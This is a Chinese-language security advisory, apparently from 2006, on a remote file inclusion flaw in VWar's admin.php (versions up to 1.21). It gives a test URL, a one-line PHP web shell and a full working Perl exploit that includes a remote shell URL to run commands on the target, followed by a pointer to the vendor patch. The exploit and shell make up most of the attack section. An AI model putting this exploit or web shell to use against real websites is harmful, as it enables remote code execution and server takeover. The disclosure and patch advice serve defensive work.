VWar admin.php远程文件包含漏洞
发布日期:2006-04-10
更新日期:2006-04-21
受影响系统:VWar VWar <= 1.21
描述:
BUGTRAQ ID:
17443
VWar是一款基于PHP的虚拟战争程序。
VWar的admin.php文件没有正确过滤用户请求,导致可能包含任意远程资源的文件,执行任意代码。
<*来源:s3rv3r_hack3r (
ali@hackerz.ir)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=114572859609488&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/path/admin/admin.php?vwar_root=http://www.example.com
#!/usr/bin/perl
#
# Exploit by s3rv3r_hack3r
# Special Thanx : hessamx ,sattar.li , stanic, mfox,blood moon and..
######################################################
# ___ ___ __ #
# / | \_____ ____ | | __ ___________________ #
#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / #
#\ Y // __ \\ \___| <\ ___/| | \// / #
# \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ #
# \/ \/ \/ \/ \/ \/ #
# Iran Hackerz Security Team #
# WebSite: www.hackerz.ir #
######################################################
# VWar <= ver 1.21 Remote Code Execution Exploit #
# usage: >>>> #
# perl vwar.pl +location of VWar+ +shell Url+ #
# location example :
http://raeget/modules/vwar/admin #
# cmd shell example: <?shell_exec($_GET[cmd]);?> #
######################################################
use LWP::Simple;
print "-------------------------------------------\n";
print "= vwar Exploit BY s3rv3r_hack3r =\n";
print "= IHST (WwW.hackerz.ir) =\n";
print"-------------------------------------------\n\n";
$targ = $ARGV[0];
$cmdurl = $ARGV[1];
$con=get("http://".$targ) || die "[-]Cannot connect to Host";
while ()
{
print "Cmd@IHST |\$";
chomp($cmd=<STDIN>);
$commd=get("http://".$targ."/admin.php?vwar_root=".$cmdurl."&cmd=".$cmd)
}
建议:
厂商补丁:
VWar
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.vwar.de/浏览次数:3030
严重程度:0(网友投票)